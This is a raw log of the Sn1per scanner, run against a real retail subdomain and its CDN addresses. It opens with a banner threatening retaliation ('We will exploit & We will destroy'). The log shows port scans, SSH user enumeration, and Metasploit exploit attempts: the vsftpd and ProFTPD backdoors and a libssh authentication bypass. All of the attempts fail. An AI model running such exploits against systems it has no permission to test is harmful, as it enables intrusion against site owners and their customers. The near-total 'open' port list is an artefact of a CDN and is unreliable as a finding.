*Note: This scan has been condensed and needs to parsed and fact checked.

██████  ███████  █████  ██    ██ ███████ ███████                                              
██   ██ ██      ██   ██ ██    ██ ██      ██                                                   
██████  █████   ███████ ██    ██ ███████ █████                                                
██   ██ ██      ██   ██ ██    ██      ██ ██                                                   
██████  ███████ ██   ██  ██████  ███████ ███████                                              
                                                                                              
                                                                                              
██    ██  ██████  ██    ██                                                                    
 ██  ██  ██    ██ ██    ██                                                                    
  ████   ██    ██ ██    ██                                                                    
   ██    ██    ██ ██    ██                                                                    
   ██     ██████   ██████                                                                     
                                                                                              
                                                                                              
██████  ███████ ██████   ██████  ██████  ████████ ███████ ██████                              
██   ██ ██      ██   ██ ██    ██ ██   ██    ██    ██      ██   ██                             
██████  █████   ██████  ██    ██ ██████     ██    █████   ██   ██                             
██   ██ ██      ██      ██    ██ ██   ██    ██    ██      ██   ██                             
██   ██ ███████ ██       ██████  ██   ██    ██    ███████ ██████                              
                                                                                              
 ██████  ██    ██ ██████       █████   ██████  ██████  ██████  ██    ██ ███    ██ ████████          
██    ██ ██    ██ ██   ██     ██   ██ ██      ██      ██    ██ ██    ██ ████   ██    ██             
██    ██ ██    ██ ██████      ███████ ██      ██      ██    ██ ██    ██ ██ ██  ██    ██             
██    ██ ██    ██ ██   ██     ██   ██ ██      ██      ██    ██ ██    ██ ██  ██ ██    ██             
 ██████   ██████  ██   ██     ██   ██  ██████  ██████  ██████   ██████  ██   ████    ██    ██ ██ ██ 
                                                                                                    
                                                                                                    
                                                                                              
                                                                                              

We are digging. We will find. We will exploit & We will destroy. Enjoy =)



    _________  /  _/___  ___  _____
   / ___/ __ \ / // __ \/ _ \/ ___/
  (__  ) / / // // /_/ /  __/ /    
 /____/_/ /_/___/ .___/\___/_/     
               /_/                 

 + -- --=[https://sn1persecurity.com
 + -- --=[Sn1per v9.0 by @xer0dayz

modes/normal.sh: line 52: /usr/share/sniper/loot/workspace/guestmob.myspreadshop.com-/scans/guestmob.myspreadshop.com/-normal.txt: No such file or directory
modes/normal.sh: line 53: /usr/share/sniper/loot/workspace/guestmob.myspreadshop.com-/scans/running_guestmob.myspreadshop.com/_normal.txt: No such file or directory
====================================================================================•x[2022-02-21](13:02)x•
 GATHERING DNS INFO 
====================================================================================•x[2022-02-21](13:02)x•
modes/normal.sh: line 64: /usr/share/sniper/loot/workspace/guestmob.myspreadshop.com-/nmap/dns-guestmob.myspreadshop.com/.txt: No such file or directory
modes/normal.sh: line 65: /usr/share/sniper/loot/workspace/guestmob.myspreadshop.com-/nmap/dns-guestmob.myspreadshop.com/.txt: No such file or directory
====================================================================================•x[2022-02-21](13:02)x•
 CHECKING FOR SUBDOMAIN HIJACKING 
====================================================================================•x[2022-02-21](13:02)x•

====================================================================================•x[2022-02-21](13:02)x•
 PINGING HOST 
====================================================================================•x[2022-02-21](13:02)x•
ping: guestmob.myspreadshop.com/: Name or service not known

 + -- --=[Port 21 closed... skipping.
 + -- --=[Port 22 closed... skipping.
 + -- --=[Port 23 closed... skipping.
 + -- --=[Port 25 closed... skipping.
 + -- --=[Port 53 closed... skipping.
 + -- --=[Port 67 closed... skipping.
 + -- --=[Port 68 closed... skipping.
 + -- --=[Port 69 closed... skipping.
 + -- --=[Port 79 closed... skipping.
 + -- --=[Port 110 closed... skipping.
 + -- --=[Port 111 closed... skipping.
 + -- --=[Port 123 closed... skipping.
 + -- --=[Port 135 closed... skipping.
 + -- --=[Port 137 closed... skipping.
 + -- --=[Port 139 closed... skipping.
 + -- --=[Port 161 closed... skipping.
 + -- --=[Port 162 closed... skipping.
 + -- --=[Port 264 closed... skipping.
 + -- --=[Port 389 closed... skipping.
 + -- --=[Port 445 closed... skipping.
 + -- --=[Port 500 closed... skipping.
 + -- --=[Port 512 closed... skipping.
 + -- --=[Port 513 closed... skipping.
 + -- --=[Port 514 closed... skipping.
 + -- --=[Port 1099 closed... skipping.
 + -- --=[Port 1433 closed... skipping.
 + -- --=[Port 2049 closed... skipping.
 + -- --=[Port 2181 closed... skipping.
 + -- --=[Port 3306 closed... skipping.
 + -- --=[Port 3310 closed... skipping.
 + -- --=[Port 3128 closed... skipping.
 + -- --=[Port 3389 closed... skipping.
 + -- --=[Port 3632 closed... skipping.
 + -- --=[Port 5432 closed... skipping.
 + -- --=[Port 5555 closed... skipping.
 + -- --=[Port 5800 closed... skipping.
 + -- --=[Port 5900 closed... skipping.
 + -- --=[Port 5984 closed... skipping.
 + -- --=[Port 6000 closed... skipping.
 + -- --=[Port 6667 closed... skipping.
 + -- --=[Port 7001 closed... skipping.
 + -- --=[Port 8000 closed... skipping.
 + -- --=[Port 8001 closed... skipping.
 + -- --=[Port 9495 closed... skipping.
 + -- --=[Port 10000 closed... skipping.
 + -- --=[Port 16992 closed... skipping.
 + -- --=[Port 27017 closed... skipping.
 + -- --=[Port 27018 closed... skipping.
 + -- --=[Port 27019 closed... skipping.
 + -- --=[Port 28017 closed... skipping.
 + -- --=[Port 49180 closed... skipping.
====================================================================================•x[2022-02-21](13:02)x•
 SCANNING ALL HTTP PORTS 
====================================================================================•x[2022-02-21](13:02)x•
cat: /usr/share/sniper/loot/workspace/guestmob.myspreadshop.com-/nmap/nmap-guestmob.myspreadshop.com/.xml: No such file or directory
====================================================================================•x[2022-02-21](13:02)x•
 SCANNING ALL HTTPS PORTS 
====================================================================================•x[2022-02-21](13:02)x•
cat: /usr/share/sniper/loot/workspace/guestmob.myspreadshop.com-/nmap/nmap-guestmob.myspreadshop.com/.xml: No such file or directory
====================================================================================•x[2022-02-21](13:02)x•
 RUNNING SC0PE NETWORK VULNERABILITY SCAN 
====================================================================================•x[2022-02-21](13:02)x•
====================================================================================•x[2022-02-21](13:02)x•
====================================================================================•x[2022-02-21](13:02)x•
 PERFORMING TCP PORT SCAN 
====================================================================================•x[2022-02-21](13:02)x•
                ____               
    _________  /  _/___  ___  _____
   / ___/ __ \ / // __ \/ _ \/ ___/
  (__  ) / / // // /_/ /  __/ /    
 /____/_/ /_/___/ .___/\___/_/     
               /_/                 

[*] Opening loot directory /usr/share/sniper/loot/workspace/guestmob.myspreadshop.com- [OK]
 + -- --=[ Generating reports...
[]
 + -- --=[ Sorting all files...
 + -- --=[ Removing blank screenshots and files...
 + -- --=[ Sn1per Professional is not installed. To download Sn1per Professional, go to https://sn1persecurity.com. 
 + -- --=[ Done!
┌─[✗]─[juicesleuth@str1kef0rce]─[~]
└──╼ $sudo sniper -t guestmob.myspreadshop.com
[*] Loaded configuration file from /usr/share/sniper/sniper.conf [OK]
[*] Loaded configuration file from /root/.sniper.conf [OK]
[*] Saving loot to /usr/share/sniper/loot/ [OK]
[*] Scanning guestmob.myspreadshop.com [OK]
[*] Checking for active internet connection [OK]
[*] Loaded configuration file from /usr/share/sniper/sniper.conf [OK]
[*] Loaded configuration file from /root/.sniper.conf [OK]
[*] Saving loot to /usr/share/sniper/loot/workspace/guestmob.myspreadshop.com [OK]
[*] Scanning guestmob.myspreadshop.com [OK]
                ____               
    _________  /  _/___  ___  _____
   / ___/ __ \ / // __ \/ _ \/ ___/
  (__  ) / / // // /_/ /  __/ /    
 /____/_/ /_/___/ .___/\___/_/     
               /_/                 

 + -- --=[https://sn1persecurity.com
 + -- --=[Sn1per v9.0 by @xer0dayz

====================================================================================•x[2022-02-21](13:02)x•
 GATHERING DNS INFO 
====================================================================================•x[2022-02-21](13:02)x•
====================================================================================•x[2022-02-21](13:02)x•
 CHECKING FOR SUBDOMAIN HIJACKING 
====================================================================================•x[2022-02-21](13:02)x•

====================================================================================•x[2022-02-21](13:02)x•
 PINGING HOST 
====================================================================================•x[2022-02-21](13:02)x•
PING guestmob.myspreadshop.com (151.101.130.137) 56(84) bytes of data.
64 bytes from 151.101.130.137 (151.101.130.137): icmp_seq=1 ttl=58 time=63.8 ms

--- guestmob.myspreadshop.com ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 63.771/63.771/63.771/0.000 ms

====================================================================================•x[2022-02-21](13:02)x•
 RUNNING TCP PORT SCAN 
====================================================================================•x[2022-02-21](13:02)x•
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-21 13:02 EST
Nmap scan report for guestmob.myspreadshop.com (151.101.2.137)
Host is up (0.17s latency).
Other addresses for guestmob.myspreadshop.com (not scanned): 151.101.66.137 151.101.130.137 151.101.194.137 2a04:4e42::649 2a04:4e42:200::649 2a04:4e42:400::649 2a04:4e42:600::649
Not shown: 11 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
23/tcp    open  telnet
53/tcp    open  domain
67/tcp    open  dhcps
68/tcp    open  dhcpc
69/tcp    open  tftp
79/tcp    open  finger
80/tcp    open  http
110/tcp   open  pop3
111/tcp   open  rpcbind
123/tcp   open  ntp
135/tcp   open  msrpc
161/tcp   open  snmp
162/tcp   open  snmptrap
264/tcp   open  bgmp
443/tcp   open  https
500/tcp   open  isakmp
512/tcp   open  exec
513/tcp   open  login
514/tcp   open  shell
623/tcp   open  oob-ws-http
624/tcp   open  cryptoadmin
1099/tcp  open  rmiregistry
1433/tcp  open  ms-sql-s
1524/tcp  open  ingreslock
2049/tcp  open  nfs
2121/tcp  open  ccproxy-ftp
2181/tcp  open  eforward
3128/tcp  open  squid-http
3310/tcp  open  dyna-access
3389/tcp  open  ms-wbt-server
3632/tcp  open  distccd
4443/tcp  open  pharos
5555/tcp  open  freeciv
5800/tcp  open  vnc-http
5900/tcp  open  vnc
5984/tcp  open  couchdb
6667/tcp  open  irc
7001/tcp  open  afs3-callback
8000/tcp  open  http-alt
8001/tcp  open  vcom-tunnel
8080/tcp  open  http-proxy
8180/tcp  open  unknown
8443/tcp  open  https-alt
8888/tcp  open  sun-answerbook
9495/tcp  open  unknown
10000/tcp open  snet-sensor-mgmt
16992/tcp open  amt-soap-http
28017/tcp open  mongod
49152/tcp open  unknown
49180/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 3.24 seconds

====================================================================================•x[2022-02-21](13:02)x•
 RUNNING INTRUSIVE SCANS 
====================================================================================•x[2022-02-21](13:02)x•
 + -- --=[Port 21 opened... running tests...
====================================================================================•x[2022-02-21](13:02)x•
 RUNNING NMAP SCRIPTS 
====================================================================================•x[2022-02-21](13:02)x•
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-21 13:02 EST
NSE: Loaded 54 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 13:02
Completed NSE at 13:02, 0.00s elapsed
Initiating NSE at 13:02
Completed NSE at 13:02, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 13:02
Completed Parallel DNS resolution of 1 host. at 13:02, 0.06s elapsed
Initiating SYN Stealth Scan at 13:02
Scanning guestmob.myspreadshop.com (151.101.194.137) [1 port]
Discovered open port 21/tcp on 151.101.194.137
Completed SYN Stealth Scan at 13:02, 0.08s elapsed (1 total ports)
Initiating Service scan at 13:02
Scanning 1 service on guestmob.myspreadshop.com (151.101.194.137)
Completed Service scan at 13:05, 158.68s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against guestmob.myspreadshop.com (151.101.194.137)
Retrying OS detection (try #2) against guestmob.myspreadshop.com (151.101.194.137)
Initiating Traceroute at 13:05
Completed Traceroute at 13:05, 0.17s elapsed
Initiating Parallel DNS resolution of 1 host. at 13:05
Completed Parallel DNS resolution of 1 host. at 13:05, 0.11s elapsed
NSE: Script scanning 151.101.194.137.
Initiating NSE at 13:05
NSE Timing: About 70.83% done; ETC: 13:06 (0:00:30 remaining)
Completed NSE at 13:06, 90.72s elapsed
Initiating NSE at 13:06
Completed NSE at 13:06, 1.27s elapsed
Nmap scan report for guestmob.myspreadshop.com (151.101.194.137)
Host is up (0.13s latency).
Other addresses for guestmob.myspreadshop.com (not scanned): 151.101.2.137 151.101.66.137 151.101.130.137 2a04:4e42::649 2a04:4e42:200::649 2a04:4e42:400::649 2a04:4e42:600::649

PORT   STATE SERVICE VERSION
21/tcp open  ftp?
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (90%), Linux 5.4 (89%), Linux 5.3 - 5.4 (89%), Linux 5.0 (88%), Linux 5.0 - 5.3 (88%), Linux 5.0 - 5.4 (88%), Linux 2.6.32 (87%), HP P2000 G3 NAS device (87%), Linux 3.1 (87%), Linux 3.2 (87%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 4.757 days (since Wed Feb 16 18:57:10 2022)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=252 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE (using port 21/tcp)
HOP RTT       ADDRESS
1   170.43 ms 151.101.194.137

NSE: Script Post-scanning.
Initiating NSE at 13:06
Completed NSE at 13:06, 0.00s elapsed
Initiating NSE at 13:06
Completed NSE at 13:06, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 257.54 seconds
           Raw packets sent: 67 (6.368KB) | Rcvd: 37 (2.405KB)
====================================================================================•x[2022-02-21](13:06)x•
 RUNNING METASPLOIT FTP VERSION SCANNER 
====================================================================================•x[2022-02-21](13:06)x•
RHOST => guestmob.myspreadshop.com
RHOSTS => guestmob.myspreadshop.com
[*] guestmob.myspreadshop.com:21 - Scanned 1 of 8 hosts (12% complete)
[*] guestmob.myspreadshop.com:21 - Scanned 2 of 8 hosts (25% complete)
[*] guestmob.myspreadshop.com:21 - Scanned 3 of 8 hosts (37% complete)
[*] guestmob.myspreadshop.com:21 - Scanned 4 of 8 hosts (50% complete)
[*] guestmob.myspreadshop.com:21 - Scanned 5 of 8 hosts (62% complete)
[*] guestmob.myspreadshop.com:21 - Scanned 6 of 8 hosts (75% complete)
[*] guestmob.myspreadshop.com:21 - Scanned 7 of 8 hosts (87% complete)
[*] guestmob.myspreadshop.com:21 - Scanned 8 of 8 hosts (100% complete)
[*] Auxiliary module execution completed
====================================================================================•x[2022-02-21](13:08)x•
 RUNNING METASPLOIT ANONYMOUS FTP SCANNER 
====================================================================================•x[2022-02-21](13:08)x•
RHOST => guestmob.myspreadshop.com
RHOSTS => guestmob.myspreadshop.com
[*] guestmob.myspreadshop.com:21 - Scanned 1 of 8 hosts (12% complete)
[*] guestmob.myspreadshop.com:21 - Scanned 2 of 8 hosts (25% complete)
[*] guestmob.myspreadshop.com:21 - Scanned 3 of 8 hosts (37% complete)
[*] guestmob.myspreadshop.com:21 - Scanned 4 of 8 hosts (50% complete)
[*] guestmob.myspreadshop.com:21 - Scanned 5 of 8 hosts (62% complete)
[*] guestmob.myspreadshop.com:21 - Scanned 6 of 8 hosts (75% complete)
[*] guestmob.myspreadshop.com:21 - Scanned 7 of 8 hosts (87% complete)
[*] guestmob.myspreadshop.com:21 - Scanned 8 of 8 hosts (100% complete)
[*] Auxiliary module execution completed
====================================================================================•x[2022-02-21](13:09)x•
 RUNNING VSFTPD 2.3.4 BACKDOOR EXPLOIT 
====================================================================================•x[2022-02-21](13:09)x•
RHOST => guestmob.myspreadshop.com
RHOSTS => guestmob.myspreadshop.com
LHOST => 127.0.0.1
LPORT => 4444
[*] No payload configured, defaulting to cmd/unix/interact
[*] Exploiting target 151.101.2.137
[*] 151.101.2.137:21 - The port used by the backdoor bind listener is already open
[-] 151.101.2.137:21 - The service on port 6200 does not appear to be a shell
[*] Exploiting target 151.101.66.137
[*] 151.101.66.137:21 - The port used by the backdoor bind listener is already open
[-] 151.101.66.137:21 - The service on port 6200 does not appear to be a shell
[*] Exploiting target 151.101.130.137
[*] 151.101.130.137:21 - The port used by the backdoor bind listener is already open
[-] 151.101.130.137:21 - The service on port 6200 does not appear to be a shell
[*] Exploiting target 151.101.194.137
[*] 151.101.194.137:21 - The port used by the backdoor bind listener is already open
[-] 151.101.194.137:21 - The service on port 6200 does not appear to be a shell
[*] Exploiting target 2a04:4e42:600::649
[-] 2a04:4e42:600::649:21 - Exploit failed [unreachable]: Rex::HostUnreachable The host ([2a04:4e42:600::649]:21) was unreachable.
[*] Exploiting target 2a04:4e42::649
[-] 2a04:4e42::649:21 - Exploit failed [unreachable]: Rex::HostUnreachable The host ([2a04:4e42::649]:21) was unreachable.
[*] Exploiting target 2a04:4e42:200::649
[-] 2a04:4e42:200::649:21 - Exploit failed [unreachable]: Rex::HostUnreachable The host ([2a04:4e42:200::649]:21) was unreachable.
[*] Exploiting target 2a04:4e42:400::649
[-] 2a04:4e42:400::649:21 - Exploit failed [unreachable]: Rex::HostUnreachable The host ([2a04:4e42:400::649]:21) was unreachable.
[*] Exploit completed, but no session was created.
====================================================================================•x[2022-02-21](13:10)x•
 RUNNING PROFTPD 1.3.3C BACKDOOR EXPLOIT 
====================================================================================•x[2022-02-21](13:10)x•
RHOST => guestmob.myspreadshop.com
RHOSTS => guestmob.myspreadshop.com
LHOST => 127.0.0.1
LPORT => 4444
[*] Exploiting target 151.101.66.137
[-] 151.101.66.137:21 - Exploit failed: A payload has not been selected.
[*] Exploiting target 151.101.130.137
[-] 151.101.130.137:21 - Exploit failed: A payload has not been selected.
[*] Exploiting target 151.101.194.137
[-] 151.101.194.137:21 - Exploit failed: A payload has not been selected.
[*] Exploiting target 151.101.2.137
[-] 151.101.2.137:21 - Exploit failed: A payload has not been selected.
[*] Exploiting target 2a04:4e42:600::649
[-] 2a04:4e42:600::649:21 - Exploit failed: A payload has not been selected.
[*] Exploiting target 2a04:4e42::649
[-] 2a04:4e42::649:21 - Exploit failed: A payload has not been selected.
[*] Exploiting target 2a04:4e42:200::649
[-] 2a04:4e42:200::649:21 - Exploit failed: A payload has not been selected.
[*] Exploiting target 2a04:4e42:400::649
[-] 2a04:4e42:400::649:21 - Exploit failed: A payload has not been selected.
[*] Exploit completed, but no session was created.
 + -- --=[Port 22 opened... running tests...
====================================================================================•x[2022-02-21](13:10)x•
 RUNNING SSH AUDIT 
====================================================================================•x[2022-02-21](13:10)x•
[exception] did not receive banner.
====================================================================================•x[2022-02-21](13:10)x•
 RUNNING NMAP SCRIPTS 
====================================================================================•x[2022-02-21](13:10)x•
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-21 13:10 EST
NSE: Loaded 51 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 13:10
Completed NSE at 13:10, 0.00s elapsed
Initiating NSE at 13:10
Completed NSE at 13:10, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 13:10
Completed Parallel DNS resolution of 1 host. at 13:10, 0.07s elapsed
Initiating SYN Stealth Scan at 13:10
Scanning guestmob.myspreadshop.com (151.101.130.137) [1 port]
Discovered open port 22/tcp on 151.101.130.137
Completed SYN Stealth Scan at 13:10, 0.11s elapsed (1 total ports)
Initiating Service scan at 13:10
Scanning 1 service on guestmob.myspreadshop.com (151.101.130.137)
Completed Service scan at 13:13, 158.39s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against guestmob.myspreadshop.com (151.101.130.137)
Retrying OS detection (try #2) against guestmob.myspreadshop.com (151.101.130.137)
Initiating Traceroute at 13:13
Completed Traceroute at 13:13, 0.10s elapsed
Initiating Parallel DNS resolution of 1 host. at 13:13
Completed Parallel DNS resolution of 1 host. at 13:13, 0.09s elapsed
NSE: Script scanning 151.101.130.137.
Initiating NSE at 13:13
Completed NSE at 13:13, 15.53s elapsed
Initiating NSE at 13:13
Completed NSE at 13:13, 1.11s elapsed
Nmap scan report for guestmob.myspreadshop.com (151.101.130.137)
Host is up (0.079s latency).
Other addresses for guestmob.myspreadshop.com (not scanned): 151.101.194.137 151.101.2.137 151.101.66.137 2a04:4e42:600::649 2a04:4e42::649 2a04:4e42:200::649 2a04:4e42:400::649

PORT   STATE SERVICE VERSION
22/tcp open  ssh?
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
|_ssh-run: ERROR: Script execution failed (use -d to debug)
|_ssh-brute: ERROR: Script execution failed (use -d to debug)
|_ssh-publickey-acceptance: ERROR: Script execution failed (use -d to debug)
|_ssh-auth-methods: ERROR: Script execution failed (use -d to debug)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (90%), Linux 5.0 (90%), Linux 5.0 - 5.4 (90%), Linux 5.3 - 5.4 (90%), Linux 2.6.32 (90%), Linux 5.0 - 5.3 (89%), Linux 5.4 (88%), HP P2000 G3 NAS device (87%), Linux 3.1 (87%), Linux 3.2 (87%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 27.425 days (since Tue Jan 25 03:01:21 2022)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE (using port 22/tcp)
HOP RTT      ADDRESS
1   91.95 ms 151.101.130.137

NSE: Script Post-scanning.
Initiating NSE at 13:13
Completed NSE at 13:13, 0.00s elapsed
Initiating NSE at 13:13
Completed NSE at 13:13, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 180.20 seconds
           Raw packets sent: 70 (6.812KB) | Rcvd: 39 (2.728KB)
====================================================================================•x[2022-02-21](13:13)x•
 RUNNING SSH VERSION SCANNER 
====================================================================================•x[2022-02-21](13:13)x•
USER_FILE => /usr/share/brutex/wordlists/simple-users.txt
RHOSTS => guestmob.myspreadshop.com
RHOST => guestmob.myspreadshop.com
[*] guestmob.myspreadshop.com:22 - Scanned 1 of 8 hosts (12% complete)
[*] guestmob.myspreadshop.com:22 - Scanned 2 of 8 hosts (25% complete)
[*] guestmob.myspreadshop.com:22 - Scanned 3 of 8 hosts (37% complete)
[*] guestmob.myspreadshop.com:22 - Scanned 4 of 8 hosts (50% complete)
[*] guestmob.myspreadshop.com:22 - Scanned 5 of 8 hosts (62% complete)
[*] guestmob.myspreadshop.com:22 - Scanned 6 of 8 hosts (75% complete)
[*] guestmob.myspreadshop.com:22 - Scanned 7 of 8 hosts (87% complete)
[*] guestmob.myspreadshop.com:22 - Scanned 8 of 8 hosts (100% complete)
[*] Auxiliary module execution completed
====================================================================================•x[2022-02-21](13:14)x•
 RUNNING OPENSSH USER ENUM SCANNER 
====================================================================================•x[2022-02-21](13:14)x•
USER_FILE => /usr/share/brutex/wordlists/simple-users.txt
RHOSTS => guestmob.myspreadshop.com
RHOST => guestmob.myspreadshop.com
[*] 151.101.194.137:22 - SSH - Using malformed packet technique
[*] 151.101.194.137:22 - SSH - Starting scan
[*] Scanned 1 of 8 hosts (12% complete)
[*] 151.101.2.137:22 - SSH - Using malformed packet technique
[*] 151.101.2.137:22 - SSH - Starting scan
[*] Scanned 2 of 8 hosts (25% complete)
[*] 151.101.66.137:22 - SSH - Using malformed packet technique
[*] 151.101.66.137:22 - SSH - Starting scan
[*] Scanned 3 of 8 hosts (37% complete)
[*] 151.101.130.137:22 - SSH - Using malformed packet technique
[*] 151.101.130.137:22 - SSH - Starting scan
[*] Scanned 4 of 8 hosts (50% complete)
[*] 2a04:4e42:200::649:22 - SSH - Using malformed packet technique
[*] 2a04:4e42:200::649:22 - SSH - Starting scan
[*] Scanned 4 of 8 hosts (50% complete)
[*] Scanned 5 of 8 hosts (62% complete)
[*] 2a04:4e42:400::649:22 - SSH - Using malformed packet technique
[*] 2a04:4e42:400::649:22 - SSH - Starting scan
[*] Scanned 6 of 8 hosts (75% complete)
[*] 2a04:4e42:600::649:22 - SSH - Using malformed packet technique
[*] 2a04:4e42:600::649:22 - SSH - Starting scan
[*] Scanned 7 of 8 hosts (87% complete)
[*] 2a04:4e42::649:22 - SSH - Using malformed packet technique
[*] 2a04:4e42::649:22 - SSH - Starting scan
[*] Scanned 8 of 8 hosts (100% complete)
[*] Auxiliary module execution completed
====================================================================================•x[2022-02-21](14:20)x•
 RUNNING LIBSSH AUTH BYPASS EXPLOIT CVE-2018-10933 
====================================================================================•x[2022-02-21](14:20)x•
RHOSTS => guestmob.myspreadshop.com
RHOST => guestmob.myspreadshop.com
LHOST => 127.0.0.1
LPORT => 4444
[*] 151.101.194.137:22 - Attempting authentication bypass
[*] Scanned 1 of 8 hosts (12% complete)
[*] 151.101.2.137:22 - Attempting authentication bypass
[*] Scanned 2 of 8 hosts (25% complete)
[*] 151.101.66.137:22 - Attempting authentication bypass
[*] Scanned 3 of 8 hosts (37% complete)
[*] 151.101.130.137:22 - Attempting authentication bypass
[*] Scanned 4 of 8 hosts (50% complete)
[*] 2a04:4e42:200::649:22 - Attempting authentication bypass
[*] Scanned 5 of 8 hosts (62% complete)
[*] 2a04:4e42:400::649:22 - Attempting authentication bypass
[*] Scanned 6 of 8 hosts (75% complete)
[*] 2a04:4e42:600::649:22 - Attempting authentication bypass
[*] Scanned 7 of 8 hosts (87% complete)
[*] 2a04:4e42::649:22 - Attempting authentication bypass
[*] Scanned 8 of 8 hosts (100% complete)
[*] Auxiliary module execution completed
 + -- --=[Port 23 opened... running tests...
====================================================================================•x[2022-02-21](14:20)x•
 RUNNING NMAP SCRIPTS 
====================================================================================•x[2022-02-21](14:20)x•
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-21 14:20 EST
NSE: Loaded 49 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 14:21
Completed NSE at 14:21, 0.00s elapsed
Initiating NSE at 14:21
Completed NSE at 14:21, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 14:21
Completed Parallel DNS resolution of 1 host. at 14:21, 0.08s elapsed
Initiating SYN Stealth Scan at 14:21
Scanning guestmob.myspreadshop.com (151.101.66.137) [1 port]
Discovered open port 23/tcp on 151.101.66.137
Completed SYN Stealth Scan at 14:21, 0.09s elapsed (1 total ports)
Initiating Service scan at 14:21
Scanning 1 service on guestmob.myspreadshop.com (151.101.66.137)
Completed Service scan at 14:23, 164.21s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against guestmob.myspreadshop.com (151.101.66.137)
Retrying OS detection (try #2) against guestmob.myspreadshop.com (151.101.66.137)
Initiating Traceroute at 14:23
Completed Traceroute at 14:23, 0.18s elapsed
Initiating Parallel DNS resolution of 1 host. at 14:23
Completed Parallel DNS resolution of 1 host. at 14:23, 0.10s elapsed
NSE: Script scanning 151.101.66.137.
Initiating NSE at 14:23
Completed NSE at 14:24, 15.18s elapsed
Initiating NSE at 14:24
Completed NSE at 14:24, 1.10s elapsed
Nmap scan report for guestmob.myspreadshop.com (151.101.66.137)
Host is up (0.13s latency).
Other addresses for guestmob.myspreadshop.com (not scanned): 151.101.130.137 151.101.194.137 151.101.2.137 2a04:4e42:600::649 2a04:4e42::649 2a04:4e42:200::649 2a04:4e42:400::649

PORT   STATE SERVICE VERSION
23/tcp open  telnet?
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (90%), Linux 5.0 (90%), Linux 5.0 - 5.4 (90%), Linux 5.3 - 5.4 (90%), Linux 2.6.32 (90%), Linux 5.0 - 5.3 (89%), Linux 5.4 (88%), HP P2000 G3 NAS device (87%), Linux 3.1 (87%), Linux 3.2 (87%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 20.937 days (since Mon Jan 31 15:54:54 2022)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE (using port 23/tcp)
HOP RTT       ADDRESS
1   173.40 ms 151.101.66.137
NSE: Script Post-scanning.
Initiating NSE at 14:24
Completed NSE at 14:24, 0.00s elapsed
Initiating NSE at 14:24
Completed NSE at 14:24, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 186.82 seconds
           Raw packets sent: 67 (6.368KB) | Rcvd: 44 (3.212KB)
====================================================================================•x[2022-02-21](14:24)x•
 RUNNING METASPLOIT MODULES 
====================================================================================•x[2022-02-21](14:24)x•
RHOSTS => guestmob.myspreadshop.com
RHOST => guestmob.myspreadshop.com
LHOST => 127.0.0.1
LPORT => 4444
[*] Scanned 1 of 8 hosts (12% complete)
[*] Scanned 2 of 8 hosts (25% complete)
[*] Scanned 3 of 8 hosts (37% complete)
[*] Scanned 4 of 8 hosts (50% complete)
[-] Connection error
[*] Scanned 5 of 8 hosts (62% complete)
[-] Connection error
[*] Scanned 6 of 8 hosts (75% complete)
[-] Connection error
[*] Scanned 7 of 8 hosts (87% complete)
[-] Connection error
[*] Scanned 8 of 8 hosts (100% complete)
[*] Auxiliary module execution completed
